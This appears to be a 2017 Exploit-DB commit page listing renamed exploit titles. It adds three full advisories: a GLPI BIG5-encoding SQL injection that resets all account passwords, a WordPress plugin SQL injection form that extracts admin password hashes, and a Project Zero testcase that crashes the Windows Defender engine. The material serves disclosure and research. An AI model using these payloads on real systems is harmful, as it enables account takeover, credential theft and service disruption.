Izumi 1.1.0 - (Remote File Inclusion / Local File Inclusion) Multiple Include
Izumi 1.1.0 - (Local File Inclusion / Remote File Inclusion) Multiple Include

TSOKA:CMS 1.1 / 1.9 / 2.0 - SQL Injection / Cross-Site Scripting
TSOKA:CMS 1.1/1.9/2.0 - SQL Injection / Cross-Site Scripting

Facil-CMS 0.1RC2 - Local / Remote File Inclusion
Facil-CMS 0.1RC2 - Local/Remote File Inclusion

jevoncms - Local File Inclusion / Remote File Inclusion
jevoncms - Local/Remote File Inclusion

Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion
Vieassociative Openmairie 1.01 Beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions
Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion
Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion
Openurgence vaccin 1.03 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions
Police Municipale Open Main Courante 1.01beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions

Openscrutin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion
Openscrutin 1.03 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions

Openreglement 1.04 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion
Openreglement 1.04 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions

Openregistrecil 1.02 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion
Openregistrecil 1.02 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions
Openplanning 1.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion
Openfoncier 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion
Madirish Webmail 2.01 - 'baseDir' Remote File Inclusion / Local File Inclusion
Openplanning 1.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions
Openfoncier 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions
Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion

Opencourrier 2.03beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion
Opencourrier 2.03beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions

AutoDealer 1.0 / 2.0 - MSSQL Injection
AutoDealer 1.0/2.0 - MSSQL Injection

Openannuaire Openmairie Annuaire 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion
Openannuaire Openmairie Annuaire 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions

Waibrasil - Remote File Inclusion / Local File Inclusion
Waibrasil - Local/Remote File Inclusion

Spaw Editor 1.0 / 2.0 - Arbitrary File Upload
Spaw Editor 1.0/2.0 - Arbitrary File Upload

PHP SETI@home Web monitor - (PHPsetimon) Remote File Inclusion / Local File Inclusion
PHP SETI@home Web monitor - 'PHPsetimon' Local/Remote File Inclusion

vBulletin(R) 3.8.6 - faq.php Information Disclosure
vBulletin 3.8.6 - 'faq.php' Information Disclosure

Open Realty 2.x / 3.x - Persistent Cross-Site Scripting
Open Realty 2.x/3.x - Persistent Cross-Site Scripting

vBulletin 3.8.4 / 3.8.5 - Registration Bypass
vBulletin 3.8.4/3.8.5 - Registration Bypass

vbShout 5.2.2 - Remote / Local File Inclusion
vbShout 5.2.2 - Local/Remote File Inclusion

Zoopeer 0.1 / 0.2 - 'FCKeditor' Arbitrary File Upload
Zoopeer 0.1/0.2 - 'FCKeditor' Arbitrary File Upload

xt:Commerce Shopsoftware 3 / 4 - 'FCKeditor' Arbitrary File Upload
xt:Commerce Shopsoftware 3/4 - 'FCKeditor' Arbitrary File Upload

CakePHP 1.3.5 / 1.2.8 - Unserialize()
CakePHP 1.3.5/1.2.8 - 'Unserialize()' Exploit
vBSEO 3.5.2 / 3.2.2 - Persistent Cross-Site Scripting via LinkBacks
vBSEO Sitemap 2.5 / 3.0 - Multiple Vulnerabilities
vBSEO 3.2.2/3.5.2 - Persistent Cross-Site Scripting via LinkBacks
vBSEO Sitemap 2.5/3.0 - Multiple Vulnerabilities

Geomi CMS 1.2 / 3.0 - SQL Injection
Geomi CMS 1.2/3.0 - SQL Injection

cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection
cChatBox for vBulletin 3.6.8/3.7.x - SQL Injection

Redmine SCM Repository 0.9.x / 1.0.x - Arbitrary Command Execution (Metasploit)
Redmine SCM Repository 0.9.x/1.0.x - Arbitrary Command Execution (Metasploit)

vBulletin - misc.php Template Name Arbitrary Code Execution (Metasploit)
vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit)

CakePHP 1.3.5 / 1.2.8 - Cache Corruption Exploit (Metasploit)
CakePHP 1.3.5/1.2.8 - Cache Corruption Exploit (Metasploit)

SmarterMail 7.3 / 7.4 - Multiple Vulnerabilities
SmarterMail 7.3/7.4 - Multiple Vulnerabilities

WordPress Plugin BackWPup - Remote Code Execution /Local Code Execution
WordPress Plugin BackWPup - Remote Code Execution / Local Code Execution

WebSVN 2.3.2 - Unproper Metacharacters Escaping exec() Remote Command Injection
WebSVN 2.3.2 - Unproper Metacharacters Escaping 'exec()' Remote Command Injection

LuxCal Web Calendar 2.4.2 / 2.5.0 - SQL Injection
LuxCal Web Calendar 2.4.2/2.5.0 - SQL Injection

Joomla! Component 'com_virtuemart' 1.5 / 1.1.7 - Blind Time-Based SQL Injection (Metasploit)
Joomla! Component 'com_virtuemart' 1.1.7/1.5 - Blind Time-Based SQL Injection (Metasploit)
WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities
Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution
WSN Classifieds 6.2.12/6.2.18 - Multiple Vulnerabilities
Family Connections CMS 2.5.0/2.7.1 - 'less.php' Remote Command Execution

Typo3 4.5 < 4.7 - Remote Code Execution (Remote File Inclusion / Local File Inclusion)
Typo3 4.5 < 4.7 - Remote Code Execution / Local File Inclusion / Remote File Inclusion

phpMyAdmin 3.3.x / 3.4.x - Local File Inclusion via XXE Injection (Metasploit)
phpMyAdmin 3.3.x/3.4.x - Local File Inclusion via XXE Injection (Metasploit)

Log1 CMS - writeInfo() PHP Code Injection (Metasploit)
Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit)

MiniCMS 1.0 / 2.0 - PHP Code Inject
MiniCMS 1.0/2.0 - PHP Code Injection

4Images 1.7.6-9 - Cross-Site Request Forgery / Inject PHP Code
4Images 1.7.6-9 - Cross-Site Request Forgery / PHP Code Injection

FreePBX 2.10.0 / 2.9.0 - Multiple Vulnerabilities
FreePBX 2.9.0/2.10.0 - Multiple Vulnerabilities

FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution (Metasploit)
FreePBX 2.9.0/2.10.0 - 'callmenum' Remote Code Execution (Metasploit)

Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - SQL Injection
Woltlab Burning Board 2.2/2.3 [WN]KT KickTipp 3.1 - SQL Injection
SugarCRM CE 6.3.1 - Unserialize() PHP Code Execution (Metasploit)
webERP 4.08.1 - Local / Remote File Inclusion
SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution (Metasploit)
webERP 4.08.1 - Local/Remote File Inclusion

Tiki Wiki CMS Groupware 8.3 - Unserialize() PHP Code Execution (Metasploit)
Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution (Metasploit)

House Style 0.1.2 - readfile() Local File Disclosure
House Style 0.1.2 - 'readfile()' Local File Disclosure

OTRS Open Technology Real Services 3.1.8 / 3.1.9 - Cross-Site Scripting
OTRS Open Technology Real Services 3.1.8/3.1.9 - Cross-Site Scripting

ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Persistent Cross-Site Scripting
ServersCheck Monitoring Software 9.0.12/9.0.14 - Persistent Cross-Site Scripting

airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection
airVisionNVR 1.1.13 - 'readfile()' Disclosure / SQL Injection

Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities
Kerio Control Unified Threat Management 9.1.0 build 1087/9.1.1 build 1324 - Multiple Vulnerabilities

IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting
IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting

Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection
Alt-N MDaemon 12.5.6/13.0.3 - Email Body HTML/JS Injection

parachat 5.5 - Directory Traversal
Parachat 5.5 - Directory Traversal

DCP-Portal 3.7/4.x/5.x - calendar.php Multiple Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - 'calendar.php' Multiple Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - announcement.php cid Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - news.php cid Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - contents.php cid Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - 'announcement.php' 'cid' Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - 'news.php' 'cid' Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - 'contents.php' 'cid' Parameter Cross-Site Scripting

DCP-Portal 3.7/4.x/5.x - calendar.php HTTP Response Splitting
DCP-Portal 3.7/4.x/5.x - 'calendar.php' HTTP Response Splitting
UBBCentral UBB.Threads 6.2.3/6.5 - showflat.php Cat Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - calendar.php Cat Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php' Cat Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - online.php Cat Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php' 'Cat' Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php' 'Cat' Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php' 'Cat' Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php' 'Cat' Parameter Cross-Site Scripting

phpVms Virtual Airline Administration 2.1.934 / 2.1.935 - SQL Injection
phpVms Virtual Airline Administration 2.1.934/2.1.935 - SQL Injection

phpMyAdmin 3.5.8 / 4.0.0-RC2 - Multiple Vulnerabilities
phpMyAdmin 3.5.8/4.0.0-RC2 - Multiple Vulnerabilities

UBBCentral UBB.Threads 6.0 - editpost.php SQL Injection
UBBCentral UBB.Threads 6.0 - 'editpost.php' SQL Injection

Wifi Photo Transfer 2.1 / 1.1 PRO - Multiple Vulnerabilities
Wifi Photo Transfer 2.1/1.1 PRO - Multiple Vulnerabilities

File Lite 3.3 / 3.5 PRO iOS - Multiple Vulnerabilities
File Lite 3.3/3.5 PRO iOS - Multiple Vulnerabilities

IPB (Invision Power Board) 1.x? / 2.x / 3.x - Admin Account Takeover
IPB (Invision Power Board) 1.x?/2.x/3.x - Admin Account Takeover

UBBCentral 6.0 - UBB.threads Printthread.php SQL Injection
UBBCentral UBB.Threads 6.0 - 'Printthread.php' SQL Injection

Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x / 7.x) - Persistent Cross-Site Scripting
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting

SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation
SPIP - CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation

YaPiG 0.9x - Remote File Inclusion / Local File Inclusion
YaPiG 0.9x - Local/Remote File Inclusion
UBBCentral UBB.Threads 5.5.1/6.x - download.php Number Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - calendar.php Multiple Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - modifypost.php Number Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - viewmessage.php message Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - addfav.php main Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - notifymod.php Number Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - grabnext.php posted Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'download.php' 'Number' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php' 'Number' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php' 'message' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php' 'main' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php' 'Number' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php' 'posted' Parameter SQL Injection

Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion
Cuppa CMS - 'alertConfigField.php' Local/Remote File Inclusion

Xibo 1.2.2 / 1.4.1 - 'index.php' p Parameter Directory Traversal
Xibo 1.2.2/1.4.1 - 'index.php' p Parameter Directory Traversal

UBB.Threads 6.3 - showflat.php SQL Injection
UBBCentral UBB.Threads 6.3 - 'showflat.php' SQL Injection

Virtual Hosting Control System 2.2/2.4 - 'login.php' check_login() Function Authentication Bypass
Virtual Hosting Control System 2.2/2.4 - 'login.php' 'check_login()' Function Authentication Bypass

ATutor 1.5.x - admin/fix_content.php submit Parameter Cross-Site Scripting
ATutor 1.5.x - 'admin/fix_content.php' 'submit' Parameter Cross-Site Scripting

Mirapoint Web Mail - Expression() HTML Injection
Mirapoint Web Mail - 'Expression()' HTML Injection

Onpub CMS 1.4 / 1.5 - Multiple SQL Injections
Onpub CMS 1.4/1.5 - Multiple SQL Injections

ImpressPages CMS 3.6 - manage() Function Remote Code Execution
ImpressPages CMS 3.6 - 'manage()' Function Remote Code Execution

Coppermine Photo Gallery 1.4.10 - Multiple Remote File Inclusion / Local File Inclusion
Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusion

Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass (Metasploit)
Dahua DVR 2.608.0000.0/2.608.GV00.0 - Authentication Bypass (Metasploit)

UBB.Threads 6.1.1 - UBBThreads.php SQL Injection
UBBCentral UBB.Threads 6.1.1 - 'UBBThreads.php' SQL Injection

WHMCompleteSolution (WHMCS) 4.x / 5.x - Multiple Web Vulnerabilities
WHMCompleteSolution (WHMCS) 4.x/5.x - Multiple Web Vulnerabilities

Jenkins 1.523 - Inject Persistent HTML Code
Jenkins 1.523 - Persistent HTML Code

CTERA 3.2.29.0 / 3.2.42.0 - Persistent Cross-Site Scripting
CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting

UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection
UBBCentral UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection

Drupal < 6.16 / 5.22 - Multiple Vulnerabilities
Drupal < 5.22/6.16 - Multiple Vulnerabilities

AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion
AdvertisementManager 3.1 - 'req' Parameter Local/Remote File Inclusion

Ultra Electronics 7.2.0.19 / 7.4.0.7 - Multiple Vulnerabilities
Ultra Electronics 7.2.0.19/7.4.0.7 - Multiple Vulnerabilities

net2ftp 0.98 (stable) - 'admin1.template.php' Local File Inclusion / Remote File Inclusion
net2ftp 0.98 (stable) - 'admin1.template.php' Local/Remote File Inclusion

MyBB 1.8.2 - unset_globals() Function Bypass / Remote Code Execution
MyBB 1.8.2 - 'unset_globals()' Function Bypass / Remote Code Execution

WordPress Plugin Spellchecker 3.1 - 'general.php' Local File Inclusion / Remote File Inclusion
WordPress Plugin Spellchecker 3.1 - 'general.php' Local/Remote File Inclusion
Pimcore 3.0 / 2.3.0 CMS - SQL Injection
phpList 3.0.6 / 3.0.10 - SQL Injection
Pimcore 2.3.0/3.0 CMS - SQL Injection
phpList 3.0.6/3.0.10 - SQL Injection

Guppy CMS 5.0.9 / 5.00.10 - Authentication Bypass/Change Email
Guppy CMS 5.0.9/5.00.10 - Authentication Bypass/Change Email

UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting
UBBCentral UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting

OSClass 2.3.3 - 'index.php' getParam() Function Multiple Parameter Cross-Site Scripting
OSClass 2.3.3 - 'index.php' 'getParam()' Function Multiple Parameter Cross-Site Scripting

OpenEMR 4.1 - 'Interface/fax/fax_dispatch.php' File Parameter exec() Call Arbitrary Shell Command Execution
OpenEMR 4.1 - 'Interface/fax/fax_dispatch.php' File Parameter 'exec()' Call Arbitrary Shell Command Execution

Fork CMS 3.x - backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display Cross-Site Scripting
Fork CMS 3.x - 'backend/modules/error/actions/index.php' 'parse()' Function Multiple Parameter Error Display Cross-Site Scripting

DedeCMS < 5.7-sp1 - Remote File Inclusion
DeDeCMS < 5.7-sp1 - Remote File Inclusion

WK UDID 1.0.1 iOS - Command Inject
WK UDID 1.0.1 iOS - Command Injection

MindTouch DekiWiki - Multiple Remote File Inclusion / Local File Inclusion
MindTouch DekiWiki - Multiple Local/Remote File Inclusions

PHP 5.5.9 - cgimode fpm writeprocmemfile Bypass disable function
PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function

Western Digital My Cloud 04.01.03-421 / 04.01.04-422 - Command Injection
Western Digital My Cloud 04.01.03-421/04.01.04-422 - Command Injection

Belkin Router N150 1.00.08 / 1.00.09 - Directory Traversal
Belkin Router N150 1.00.08/1.00.09 - Directory Traversal

b374k Web Shell 3.2.3 / 2.8 - Cross-Site Request Forgery / Command Injection
b374k Web Shell 3.2.3/2.8 - Cross-Site Request Forgery / Command Injection

CakePHP 2.2.8 / 2.3.7 - AssetDispatcher Class Local File Inclusion
CakePHP 2.2.8/2.3.7 - AssetDispatcher Class Local File Inclusion

AlegroCart 1.2.8 - Local File Inclusion / Remote File Inclusion
AlegroCart 1.2.8 - Local/Remote File Inclusion

HumHub 0.11.2 / 0.20.0-beta.2 - SQL Injection
HumHub 0.11.2/0.20.0-beta.2 - SQL Injection

xBoard 5.0 / 5.5 / 6.0 - 'view.php' Local File Inclusion
xBoard 5.0/5.5/6.0 - 'view.php' Local File Inclusion

qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion
qEngine 4.1.6/6.0.0 - 'task.php' Local File Inclusion

Atlassian Confluence 5.2 / 5.8.14 / 5.8.15 - Multiple Vulnerabilities
Atlassian Confluence 5.2/5.8.14/5.8.15 - Multiple Vulnerabilities

dotDefender Firewall 5.00.12865 / 5.13-13282 - Cross-Site Request Forgery
dotDefender Firewall 5.00.12865/5.13-13282 - Cross-Site Request Forgery

Chamilo LMS IDOR - (messageId) Delete POST Inject
Chamilo LMS IDOR - 'messageId' Delete POST Injection

WordPress Plugin Site Import 1.0.1 - Local File Inclusion / Remote File Inclusion
WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion

WordPress Plugin Brandfolder 3.0 - Remote File Inclusion / Local File Inclusion
WordPress Plugin Brandfolder 3.0 - Local/Remote File Inclusion

PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities
PQI Air Pen Express 6W51-0000R2/6W51-0000R2XXX - Multiple Vulnerabilities

Novell ServiceDesk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities
Novell ServiceDesk 6.5/7.0.3/7.1.0 - Multiple Vulnerabilities

Totemomail 4.x / 5.x - Persistent Cross-Site Scripting
Totemomail 4.x/5.x - Persistent Cross-Site Scripting

Tiki Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution
Tiki Wiki CMS Calendar 6.15/9.11 LTS/12.5 LTS/14.2 - Remote Code Execution

Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload
Relay Ajax Directory Manager relayb01-071706/1.5.1/1.5.3 - Unauthenticated Arbitrary File Upload

Untangle NGFW 12.1.0 Beta - execEvil() Command Injection
Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection

GSX Analyzer 10.12 / 11 - 'main.swf' Hard-Coded Superadmin Credentials
GSX Analyzer 10.12/11 - 'main.swf' Hard-Coded Superadmin Credentials

Micro Focus Filr 2 2.0.0.421 / 1.2 1.2.0.846 - Multiple Vulnerabilities
Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities

Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi Filename Remote Code Execution
Trend Micro Deep Discovery 3.7/3.8 SP1 (3.81)/3.8 SP2 (3.82) - 'hotfix_upload.cgi' Filename Remote Code Execution

WebNMS Framework Server 5.2 / 5.2 SP1 - Multiple Vulnerabilities
WebNMS Framework Server 5.2/5.2 SP1 - Multiple Vulnerabilities

Zabbix 2.2.x / 3.0.x - SQL Injection
Zabbix 2.2.x/3.0.x - SQL Injection
Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal
Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection
Lepton CMS 2.2.0/2.2.1 - Directory Traversal
Lepton CMS 2.2.0/2.2.1 - PHP Code Injection

RSS News AutoPilot Script 1.0.1 / 3.1.0 - Admin Panel Authentication Bypass
RSS News AutoPilot Script 1.0.1/3.1.0 - Admin Panel Authentication Bypass

Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection
Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 - XML External Entity Injection

SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal
SPIP 3.1.1/3.1.2 - File Enumeration / Path Traversal

WordPress Plugin Quiz And Survey Master 4.5.4 / 4.7.8 - Cross-Site Request Forgery
WordPress Plugin Quiz And Survey Master 4.5.4/4.7.8 - Cross-Site Request Forgery

Zoneminder 1.29 / 1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery
Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery

RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery
RSS News AutoPilot Script 1.0.1/3.0.3 - Cross-Site Request Forgery

Solare Datensysteme Solar-Log Devices 2.8.4-56 / 3.5.2-85 - Multiple Vulnerabilities
Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities
OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit)
OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit)
OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit)
OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit)

Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)
Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)

Horde Groupware Webmail 3 / 4 / 5 - Multiple Remote Code Execution
Horde Groupware Webmail 3/4/5 - Multiple Remote Code Execution

Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities
Alerton Webtalk 2.5/3.3 - Multiple Vulnerabilities

I_ Librarian 4.6 / 4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting
I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting
GLPI 0.90.4 - SQL Injection
WordPress Plugin Ultimate Product Catalogue 4.2.2 - SQL Injection
This commit is contained in:
Offensive Security 2017-06-28 05:01:23 +00:00
parent 40b350e820
commit 28b54c9669
5 changed files with 1099 additions and 743 deletions

1490
files.csv

File diff suppressed because it is too large Load diff

55
platforms/php/webapps/42262.txt Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: Multiple SQL injection vulnerabilities in GLPI 0.90.4
# Date: 2016/09/09
# Exploit Author: Eric CARTER (in/ericcarterengineer - CS c-s.fr)
# Vendor Homepage: http://glpi-project.org
# Software Link: http://glpi-project.org/spip.php?article3
# Version: 0.90.4
# Tested on: GLPI 0.90.4 running on a Debian 7, Apache 2.2.2, MySQL 5.5.49
# CVE : CVE-2016-7508
Multiple SQL injection vulnerabilities in GLPI 0.90.4 allow an
authenticated remote attacker to execute arbitrary SQL commands by
using the [ELIDED] character when the database is configured to use
asian encoding (BIG 5).
> [Affected Component]
The file ./inc/dbmysql.class.php defines the encoding the database
should use. This files uses the "SET NAMES" function which offers the
possibility to use a specific encoding.
> [Attack Type]
Remote
> [Impact Code execution]
True
> [Impact Escalation of Privileges]
True
> [Impact Information Disclosure]
True
> [Prerequisite]
The administrator of GLPI must have defined the variable
$dbenc='big5' in ./config/config_db.php to support asian encoding. It
will then be possible to do SQL injection in almost all the forms of
the application.
> [Attack Vectors]
For the proof-of-concept, the attacker targeted the
"Surname" form input in the User profile by adding the characters
ø (\xBF\x27) before the SQL code (the request must be sent using Western
encoding) :
ø', password=61529519452809720693702583126814 -- x
Once received by the server, the request will be sanitized, giving :
ø\', password=61529519452809720693702583126814 -- x
The value will then be sent to the database with a BIG5 encoding. Here is the
critical point, as BIG5 will see the string ø\ as a single asian character
encoded on two bytes. As the single quote isn't escaped anymore, the
SQL code will be executed and will set the password of every accounts
to the value
61529519452809720693702583126814 (=MD5 hash of "ximaz" string)

44
platforms/php/webapps/42263.txt Executable file
View file

@ -0,0 +1,44 @@
# Exploit Title: Ultimate Product Catalogue 4.2.2 Sql Injection Plugin WordPress Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 4.2.2
# Tested on: Ubuntu 16.04
1 - Description:
Type user access: register user.
$_POST[CatID] is not escaped.
http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/
2 - Proof of Concept:
1 Login as regular user (created using wp-login.php?action=register):
2 Using:
<*form method="post"
action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<*input type="text" name="CatID" value="0 UNION SELECT
user_login,user_pass FROM wp_users WHERE ID=1">
<*input type="submit">
*delete “*” in code*
3 - Timeline:
- 22/05/2017 Discovered
- 24/05/2017 Vendor not finded
- **/06/2017 - Corrected
***Rename plugin txt to zip. Problem with gmail block.
--
*Atenciosamente*
*Lenon Leite*

162
platforms/windows/dos/42264.txt Executable file
View file

@ -0,0 +1,162 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1282&desc=2
In issue 1260 I discussed Microsoft's "apicall" instruction that can invoke a large number of internal emulator apis and is exposed to remote attackers by default in all recent versions of Windows. I asked Microsoft if this was intentionally exposed, and they replied "The apicall instruction is exposed for multiple reasons", so this is intentional.
This full system x86 emulator runs as SYSTEM, is unsandboxed, is enabled by default and remotely accessible to attackers.
I took a quick stab at writing a fuzzer and immediately found heap corruption in the KERNEL32.DLL!VFS_Write API, I suspect this has never been fuzzed before. A minimal testcase would be something like this:
int main(int argc, char **argv)
{
MpApiCall("NTDLL.DLL", "NtControlChannel", 0xA); // Disable apicall limit
for (int i = 0; i < 16; i++) {
MpApiCall("NTDLL.DLL", "VFS_Open", (uint64_t) L"filename", 0);
MpApiCall("NTDLL.DLL", "VFS_Write", i, (uint64_t) "data", 0, 0);
MpApiCall("NTDLL.DLL", "VFS_Write", i, (uint64_t) "data", -1, 0);
}
return 0;
}
I suspect the MutableByteStream object getting corrupted with an unchecked memcpy, I've seen multiple different stacktraces including wild eip.
See attachment for MpApiCall() implementation, and pre-compiled testcase, renamed testcase.txt. Note that as soon as the testcase.txt file touches disk, it will immediately crash the MsMpEng service on Windows, which may destabilize your system. The testcases have been encrypted to prevent crashing your exchange server.
This bug was found on Linux using Address Sanitizer:
$ ./mpclient extra/testcase.exe
main(): Scanning extra/testcase.exe...
EngineScanCallback(): Scanning input
*** Error in `./mpclient': free(): invalid pointer: 0x0a5b4e50 ***
Aborted (core dumped)
Then verified on Windows in MsMpEng.exe:
Critical error detected c0000374
Break instruction exception - code 80000003 (first chance)
ntdll!RtlReportCriticalFailure+0x29:
001b:76fc3b6d cc int 3
2: kd> kv
ChildEBP RetAddr Args to Child
0192e638 76fc4acd c0000374 76fdedd8 0192e67c ntdll!RtlReportCriticalFailure+0x29 (FPO: [Non-Fpo])
0192e648 76fc4bad 00000002 777482b4 11109bb0 ntdll!RtlpReportHeapFailure+0x21 (FPO: [Non-Fpo])
0192e67c 76f8a1dc 0000000c 00370000 11109bb0 ntdll!RtlpLogHeapFailure+0xa1 (FPO: [Non-Fpo])
0192e76c 76f55950 0000cc5c 0000cc68 003700c4 ntdll!RtlpAllocateHeap+0x7b2 (FPO: [Non-Fpo])
*** ERROR: Symbol file could not be found. Defaulted to export symbols for mpengine.dll -
0192e7f0 66ac184e 00370000 00000008 0000cc5c ntdll!RtlAllocateHeap+0x23a (FPO: [Non-Fpo])
WARNING: Stack unwind information not available. Following frames may be wrong.
0192e808 668b60ef 0000cc5c 00000001 0cb26e40 mpengine!FreeSigFiles+0x1cb14e
